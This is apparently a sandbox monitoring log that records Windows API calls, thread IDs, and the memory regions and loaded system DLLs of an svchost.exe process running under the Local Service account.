[0321.067] CoCreateInstance (in: rclsid=0x7ff9f01b7f78*(Data1=0x323, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7ff9f01b7f88*(Data1=0x146, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6bc3a0 | out: ppv=0x6bc3a0*=0x7ff9fa119610) returned 0x0
[0321.068] CoCreateInstance (in: rclsid=0x7ff9f01b7f58*(Data1=0x34e, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7ff9f01b7f68*(Data1=0x1da, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6bc398 | out: ppv=0x6bc398*=0x265de80) returned 0x0
[0321.068] SetEvent (hEvent=0xa48) returned 1
[0321.131] WaitForSingleObject (hHandle=0xa44, dwMilliseconds=0xffffffff)
Thread:
id = 119
os_tid = 0x180
Thread:
id = 120
os_tid = 0x178
Thread:
id = 121
os_tid = 0x174
Thread:
id = 122
os_tid = 0x1b4
Thread:
id = 123
os_tid = 0x170
Thread:
id = 124
os_tid = 0x254
Thread:
id = 125
os_tid = 0x250
Thread:
id = 126
os_tid = 0x280
Thread:
id = 127
os_tid = 0x28c
Thread:
id = 128
os_tid = 0x2e8
Thread:
id = 129
os_tid = 0x320
Thread:
id = 130
os_tid = 0x2ec
Thread:
id = 131
os_tid = 0x390
Thread:
id = 132
os_tid = 0x150
Thread:
id = 133
os_tid = 0x418
Thread:
id = 134
os_tid = 0x420
Thread:
id = 135
os_tid = 0x4ac
Thread:
id = 136
os_tid = 0x51c
Thread:
id = 153
os_tid = 0x488
Thread:
id = 155
os_tid = 0x570
Thread:
id = 159
os_tid = 0x5e8
Thread:
id = 160
os_tid = 0x5ec
[0320.861] malloc (_Size=0x100) returned 0x93a900
[0320.864] PublishDebugMessage () returned 0x1
[0320.864] GetProcessHeap () returned 0x580000
[0320.864] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x108) returned 0x6bc2a0
[0320.864] GetProcessHeap () returned 0x580000
[0320.864] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x18) returned 0x265de00
[0320.864] GetProcessHeap () returned 0x580000
[0320.864] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x18) returned 0x265de40
[0320.865] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa3c
[0320.865] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa40
[0320.865] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa44
[0320.865] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa48
[0320.865] CreateThreadpoolWork (in: pfnwk=0x7ff9f01a1e90, pv=0x6bc2a0, pcbe=0x297f790 | out: pv=0x6bc2a0) returned 0x2624bf0
[0320.865] TpPostWork () returned 0x3
[0320.865] WaitForSingleObject (hHandle=0xa48, dwMilliseconds=0xffffffff) returned 0x0
[0321.068] CloseHandle (hObject=0xa48) returned 1
[0321.068] PublishDebugMessage () returned 0x1
[0321.069] GetProcessHeap () returned 0x580000
[0321.069] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x58) returned 0x2646cd0
[0321.069] GetProcessHeap () returned 0x580000
[0321.069] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xc) returned 0x2611bd0
[0321.069] memcpy (in: _Dst=0x2611bd0, _Src=0x2611ab0, _Size=0xc | out: _Dst=0x2611bd0) returned 0x2611bd0
[0321.069] GetProcessHeap () returned 0x580000
[0321.069] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xc) returned 0x26117b0
[0321.069] memcpy (in: _Dst=0x26117b0, _Src=0x2611ba0, _Size=0xc | out: _Dst=0x26117b0) returned 0x26117b0
[0321.069] PublishDebugMessage () returned 0x1
[0321.069] GetProcessHeap () returned 0x580000
[0321.069] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x198) returned 0x660ac0
[0321.069] ??0WMISchema@@QEAA@XZ () returned 0x660ac0
[0321.070] GetProcessHeap () returned 0x580000
[0321.070] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x30) returned 0x2629a30
[0321.070] GetProcessHeap () returned 0x580000
[0321.070] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x30) returned 0x26293a0
[0321.070] GetProcessHeap () returned 0x580000
[0321.070] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x18) returned 0x265dc00
[0321.070] GetProcessHeap () returned 0x580000
[0321.070] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x28) returned 0x2629bc0
[0321.070] PublishDebugMessage () returned 0x1
[0321.070] GetCurrentThread () returned 0xfffffffffffffffe
[0321.070] OpenThreadToken (in: ThreadHandle=0xfffffffffffffffe, DesiredAccess=0x2e, OpenAsSelf=1, TokenHandle=0x660c38 | out: TokenHandle=0x660c38*=0xa48) returned 1
[0321.070] GetTokenInformation (in: TokenHandle=0xa48, TokenInformationClass=0x3, TokenInformation=0x297f710, TokenInformationLength=0x10, ReturnLength=0x297f750 | out: TokenInformation=0x297f710, ReturnLength=0x297f750) returned 0
[0321.070] GetLastError () returned 0x7a
[0321.070] GetProcessHeap () returned 0x580000
[0321.070] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x148) returned 0x2640a50
[0321.070] GetTokenInformation (in: TokenHandle=0xa48, TokenInformationClass=0x3, TokenInformation=0x2640a50, TokenInformationLength=0x148, ReturnLength=0x297f750 | out: TokenInformation=0x2640a50, ReturnLength=0x297f750) returned 1
[0321.070] AdjustTokenPrivileges (in: TokenHandle=0xa48, DisableAllPrivileges=0, NewState=0x2640a50*(PrivilegesCount=0x1b, Privileges=((Luid.LowPart=0x3, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=3, Attributes=0x5), (Luid.LowPart=0x2, Luid.HighPart=7, Attributes=0x0), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xa), (Luid.LowPart=0x2, Luid.HighPart=11, Attributes=0x0), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=3, Attributes=0xe), (Luid.LowPart=0x3, Luid.HighPart=15, Attributes=0x0), (Luid.LowPart=0x10, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x0, Luid.HighPart=3, Attributes=0x16), (Luid.LowPart=0x2, Luid.HighPart=23, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x0, Luid.HighPart=3, Attributes=0x23), (Luid.LowPart=0x3, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x40280000), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
[0321.070] GetProcessHeap () returned 0x580000
[0321.071] RtlFreeHeap (HeapHandle=0x580000, Flags=0x0, BaseAddress=0x2640a50) returned 1
[0321.071] ClassCache_New () returned 0x0
[0321.071] ResultToHRESULT () returned 0x0
[0321.071] PublishDebugMessage () returned 0x1
[0321.071] GetProcessHeap () returned 0x580000
[0321.071] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x18) returned 0x265dec0
[0321.071] PublishDebugMessage () returned 0x1
Thread:
id = 163
os_tid = 0x634
Thread:
id = 164
os_tid = 0x62c
Thread:
id = 165
os_tid = 0x650
Process:
id = "7"
image_name = "svchost.exe"
filename = "c:\\windows\\system32\\svchost.exe"
page_root = "0x731fd000"
os_pid = "0x3b4"
os_integrity_level = "0x4000"
os_privileges = "0x60800000"
monitor_reason = "rpc_server"
parent_id = "6"
os_parent_pid = "0x210"
cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService"
cur_dir = "C:\\Windows\\system32\\"
os_username = "NT AUTHORITY\\Local Service"
bitness = "32"
os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AJRouter" [0xa], "NT SERVICE\\bthserv" [0xa], "NT SERVICE\\CDPSvc" [0xa], "NT SERVICE\\EventSystem" [0xa], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\FontCache" [0xa], "NT SERVICE\\LicenseManager" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\PhoneSvc" [0xa], "NT SERVICE\\RemoteRegistry" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\tzautoupdate" [0xe], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT SERVICE\\workfolderssvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000cff5" [0xc000000f], "LOCAL" [0x7]
Region:
id = 1669
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1670
start_va = 0x20000
end_va = 0x20fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "svchost.exe.mui"
filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui")
Region:
id = 1671
start_va = 0x30000
end_va = 0x44fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 1672
start_va = 0x50000
end_va = 0xcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 1673
start_va = 0xd0000
end_va = 0xd3fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000d0000"
filename = ""
Region:
id = 1674
start_va = 0xe0000
end_va = 0xe0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000e0000"
filename = ""
Region:
id = 1675
start_va = 0xf0000
end_va = 0xf1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 1676
start_va = 0x100000
end_va = 0x1bdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1677
start_va = 0x1c0000
end_va = 0x1c0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 1678
start_va = 0x1d0000
end_va = 0x1d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001d0000"
filename = ""
Region:
id = 1679
start_va = 0x1e0000
end_va = 0x1e0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001e0000"
filename = ""
Region:
id = 1680
start_va = 0x1f0000
end_va = 0x1f0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001f0000"
filename = ""
Region:
id = 1681
start_va = 0x200000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 1682
start_va = 0x400000
end_va = 0x47ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 1683
start_va = 0x480000
end_va = 0x53ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000480000"
filename = ""
Region:
id = 1684
start_va = 0x540000
end_va = 0x540fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000540000"
filename = ""
Region:
id = 1685
start_va = 0x550000
end_va = 0x556fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000550000"
filename = ""
Region:
id = 1686
start_va = 0x560000
end_va = 0x58cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "arialni.ttf"
filename = "\\Windows\\Fonts\\ARIALNI.TTF" (normalized: "c:\\windows\\fonts\\arialni.ttf")
Region:
id = 1687
start_va = 0x590000
end_va = 0x591fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "netprofmsvc.dll.mui"
filename = "\\Windows\\System32\\en-US\\netprofmsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netprofmsvc.dll.mui")
Region:
id = 1688
start_va = 0x5a0000
end_va = 0x5a6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000005a0000"
filename = ""
Region:
id = 1689
start_va = 0x600000
end_va = 0x6fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000600000"
filename = ""
Region:
id = 1690
start_va = 0x700000
end_va = 0x887fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000700000"
filename = ""
Region:
id = 1691
start_va = 0x8b0000
end_va = 0x8befff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "agencyr.ttf"
filename = "\\Windows\\Fonts\\AGENCYR.TTF" (normalized: "c:\\windows\\fonts\\agencyr.ttf")
Region:
id = 1692
start_va = 0x8d0000
end_va = 0x8d6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008d0000"
filename = ""
Region:
id = 1693
start_va = 0x8e0000
end_va = 0x8f2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "alger.ttf"
filename = "\\Windows\\Fonts\\ALGER.TTF" (normalized: "c:\\windows\\fonts\\alger.ttf")
Region:
id = 1694
start_va = 0x900000
end_va = 0x9fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000900000"
filename = ""
Region:
id = 1695
start_va = 0xa00000
end_va = 0xb80fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a00000"
filename = ""
Region:
id = 1696
start_va = 0xb90000
end_va = 0xbb4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "antquab.ttf"
filename = "\\Windows\\Fonts\\ANTQUAB.TTF" (normalized: "c:\\windows\\fonts\\antquab.ttf")
Region:
id = 1697
start_va = 0xbc0000
end_va = 0xbe4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "antquabi.ttf"
filename = "\\Windows\\Fonts\\ANTQUABI.TTF" (normalized: "c:\\windows\\fonts\\antquabi.ttf")
Region:
id = 1698
start_va = 0xc00000
end_va = 0xcfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000c00000"
filename = ""
Region:
id = 1699
start_va = 0xd00000
end_va = 0xd24fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "antquai.ttf"
filename = "\\Windows\\Fonts\\ANTQUAI.TTF" (normalized: "c:\\windows\\fonts\\antquai.ttf")
Region:
id = 1700
start_va = 0xd30000
end_va = 0xd5afff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "arialn.ttf"
filename = "\\Windows\\Fonts\\ARIALN.TTF" (normalized: "c:\\windows\\fonts\\arialn.ttf")
Region:
id = 1701
start_va = 0xd60000
end_va = 0xd8cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "arialnb.ttf"
filename = "\\Windows\\Fonts\\ARIALNB.TTF" (normalized: "c:\\windows\\fonts\\arialnb.ttf")
Region:
id = 1702
start_va = 0xd90000
end_va = 0xdbbfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "arialnbi.ttf"
filename = "\\Windows\\Fonts\\ARIALNBI.TTF" (normalized: "c:\\windows\\fonts\\arialnbi.ttf")
Region:
id = 1703
start_va = 0xe00000
end_va = 0xefffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000e00000"
filename = ""
Region:
id = 1704
start_va = 0xf00000
end_va = 0xffffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000f00000"
filename = ""
Region:
id = 1705
start_va = 0x1000000
end_va = 0x10fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001000000"
filename = ""
Region:
id = 1706
start_va = 0x1200000
end_va = 0x12fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001200000"
filename = ""
Region:
id = 1707
start_va = 0x1300000
end_va = 0x13fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001300000"
filename = ""
Region:
id = 1708
start_va = 0x1400000
end_va = 0x14fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001400000"
filename = ""
Region:
id = 1709
start_va = 0x1500000
end_va = 0x24fffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "~fontcache-fontface.dat"
filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-FontFace.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-fontface.dat")
Region:
id = 1710
start_va = 0x2500000
end_va = 0x2836fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1711
start_va = 0x2900000
end_va = 0x29fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002900000"
filename = ""
Region:
id = 1712
start_va = 0x2b00000
end_va = 0x2b7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002b00000"
filename = ""
Region:
id = 1713
start_va = 0x2b80000
end_va = 0x2c7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002b80000"
filename = ""
Region:
id = 1714
start_va = 0x2f50000
end_va = 0x304ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002f50000"
filename = ""
Region:
id = 1715
start_va = 0x3e60000
end_va = 0x3f5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003e60000"
filename = ""
Region:
id = 1716
start_va = 0x3f60000
end_va = 0x405ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003f60000"
filename = ""
Region:
id = 1717
start_va = 0x4060000
end_va = 0x415ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004060000"
filename = ""
Region:
id = 1718
start_va = 0x4160000
end_va = 0x425ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004160000"
filename = ""
Region:
id = 1719
start_va = 0x4260000
end_va = 0x435ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004260000"
filename = ""
Region:
id = 1720
start_va = 0x4360000
end_va = 0x445ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004360000"
filename = ""
Region:
id = 1721
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1722
start_va = 0x7df5ffec0000
end_va = 0x7df5fffbffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffec0000"
filename = ""
Region:
id = 1723
start_va = 0x7df5fffc0000
end_va = 0x7df5fffe2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5fffc0000"
filename = ""
Region:
id = 1724
start_va = 0x7df5ffff0000
end_va = 0x7ff5fffeffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffff0000"
filename = ""
Region:
id = 1725
start_va = 0x7ff600a40000
end_va = 0x7ff600a4cfff
monitored = 0
entry_point = 0x7ff600a43980
region_type = mapped_file
name = "svchost.exe"
filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")
Region:
id = 1726
start_va = 0x7ff9f1060000
end_va = 0x7ff9f106dfff
monitored = 0
entry_point = 0x7ff9f1061460
region_type = mapped_file
name = "npmproxy.dll"
filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll")
Region:
id = 1727
start_va = 0x7ff9f1150000
end_va = 0x7ff9f11dafff
monitored = 0
entry_point = 0x7ff9f116d2a0
region_type = mapped_file
name = "netprofmsvc.dll"
filename = "\\Windows\\System32\\netprofmsvc.dll" (normalized: "c:\\windows\\system32\\netprofmsvc.dll")
Region:
id = 1728
start_va = 0x7ff9f1bf0000
end_va = 0x7ff9f1bfcfff
monitored = 0
entry_point = 0x7ff9f1bf2650
region_type = mapped_file
name = "nsisvc.dll"
filename = "\\Windows\\System32\\nsisvc.dll" (normalized: "c:\\windows\\system32\\nsisvc.dll")
Region:
id = 1729
start_va = 0x7ff9f1e70000
end_va = 0x7ff9f1ee9fff
monitored = 0
entry_point = 0x7ff9f1e97630
region_type = mapped_file
name = "es.dll"
filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll")
Region:
id = 1730
start_va = 0x7ff9f25f0000
end_va = 0x7ff9f25fbfff
monitored = 0
entry_point = 0x7ff9f25f14d0
region_type = mapped_file
name = "locationframeworkps.dll"
filename = "\\Windows\\System32\\LocationFrameworkPS.dll" (normalized: "c:\\windows\\system32\\locationframeworkps.dll")
Region:
id = 1731
start_va = 0x7ff9f2630000
end_va = 0x7ff9f2658fff
monitored = 0
entry_point = 0x7ff9f26424d0
region_type = mapped_file
name = "fontprovider.dll"
filename = "\\Windows\\System32\\FontProvider.dll" (normalized: "c:\\windows\\system32\\fontprovider.dll")
Region:
id = 1732
start_va = 0x7ff9f2660000
end_va = 0x7ff9f2801fff
monitored = 0
entry_point = 0x7ff9f26ac2d0
region_type = mapped_file
name = "fntcache.dll"
filename = "\\Windows\\System32\\FntCache.dll" (normalized: "c:\\windows\\system32\\fntcache.dll")
Region:
id = 1733
start_va = 0x7ff9f2ae0000
end_va = 0x7ff9f2af7fff
monitored = 0
entry_point = 0x7ff9f2ae5910
region_type = mapped_file
name = "nlaapi.dll"
filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")
Region:
id = 1734
start_va = 0x7ff9f4c60000
end_va = 0x7ff9f4ca9fff
monitored = 0
entry_point = 0x7ff9f4c6ac30
region_type = mapped_file
name = "deviceaccess.dll"
filename = "\\Windows\\System32\\deviceaccess.dll" (normalized: "c:\\windows\\system32\\deviceaccess.dll")
Region:
id = 1735
start_va = 0x7ff9f4cb0000
end_va = 0x7ff9f4ce2fff
monitored = 0
entry_point = 0x7ff9f4cbd5a0
region_type = mapped_file
name = "biwinrt.dll"
filename = "\\Windows\\System32\\biwinrt.dll" (normalized: "c:\\windows\\system32\\biwinrt.dll")
Region:
id = 1736
start_va = 0x7ff9f4cf0000
end_va = 0x7ff9f4d81fff
monitored = 0
entry_point = 0x7ff9f4d3a780
region_type = mapped_file
name = "msvcp110_win.dll"
filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll")
Region:
id = 1737
start_va = 0x7ff9f4d90000
end_va = 0x7ff9f4e08fff
monitored = 0
entry_point = 0x7ff9f4da7800
region_type = mapped_file
name = "geolocation.dll"
filename = "\\Windows\\System32\\Geolocation.dll" (normalized: "c:\\windows\\system32\\geolocation.dll")
Region:
id = 1738
start_va = 0x7ff9f4e10000
end_va = 0x7ff9f4e29fff
monitored = 0
entry_point = 0x7ff9f4e1b670
region_type = mapped_file
name = "tzautoupdate.dll"
filename = "\\Windows\\System32\\tzautoupdate.dll" (normalized: "c:\\windows\\system32\\tzautoupdate.dll")
Region:
id = 1739
start_va = 0x7ff9f4ea0000
end_va = 0x7ff9f4ed5fff
monitored = 0
entry_point = 0x7ff9f4eb0070
region_type = mapped_file
name = "xmllite.dll"
filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll")
Region:
id = 1740
start_va = 0x7ff9f6f50000
end_va = 0x7ff9f704ffff
monitored = 0
entry_point = 0x7ff9f6f90f80
region_type = mapped_file
name = "twinapi.appcore.dll"
filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll")
Region:
id = 1741
start_va = 0x7ff9f75d0000
end_va = 0x7ff9f76c3fff
monitored = 0
entry_point = 0x7ff9f75da960
region_type = mapped_file
name = "ucrtbase.dll"
filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll")
Region:
id = 1742
start_va = 0x7ff9f7bf0000
end_va = 0x7ff9f7c0efff
monitored = 0
entry_point = 0x7ff9f7bf5d30
region_type = mapped_file
name = "userenv.dll"
filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll")
Region:
id = 1743
start_va = 0x7ff9f82c0000
end_va = 0x7ff9f82e8fff
monitored = 0
entry_point = 0x7ff9f82d4530
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 1744
start_va = 0x7ff9f8430000
end_va = 0x7ff9f8443fff
monitored = 0
entry_point = 0x7ff9f84352e0
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 1745
start_va = 0x7ff9f8450000
end_va = 0x7ff9f845efff
monitored = 0
entry_point = 0x7ff9f8453210
region_type = mapped_file
name = "kernel.appcore.dll"
filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")
Region:
id = 1746
start_va = 0x7ff9f8600000
end_va = 0x7ff9f8669fff
monitored = 0
entry_point = 0x7ff9f8636d50
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")
Region:
id = 1747
start_va = 0x7ff9f8d90000
end_va = 0x7ff9f8f77fff
monitored = 0
entry_point = 0x7ff9f8dbba70
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 1748
start_va = 0x7ff9f8f80000
end_va = 0x7ff9f9034fff
monitored = 0
entry_point = 0x7ff9f8fc22e0
region_type = mapped_file
name = "shcore.dll"
filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")
Region:
id = 1749
start_va = 0x7ff9f9210000
end_va = 0x7ff9f92b6fff
monitored = 0
entry_point = 0x7ff9f921b4d0
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 1750
start_va = 0x7ff9f92c0000
end_va = 0x7ff9f9402fff
monitored = 0
entry_point = 0x7ff9f92e8210
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 1751
start_va = 0x7ff9f9410000
end_va = 0x7ff9f94acfff
monitored = 0
entry_point = 0x7ff9f94178a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 1752
start_va = 0x7ff9f94b0000
end_va = 0x7ff9f9570fff
monitored = 0
entry_point = 0x7ff9f94d0da0
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 1753
start_va = 0x7ff9f9a40000
end_va = 0x7ff9f9b95fff
monitored = 0
entry_point = 0x7ff9f9a4a8d0
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1754
start_va = 0x7ff9f9ba0000
end_va = 0x7ff9f9ba7fff
monitored = 0
entry_point = 0x7ff9f9ba1ea0
region_type = mapped_file
name = "nsi.dll"
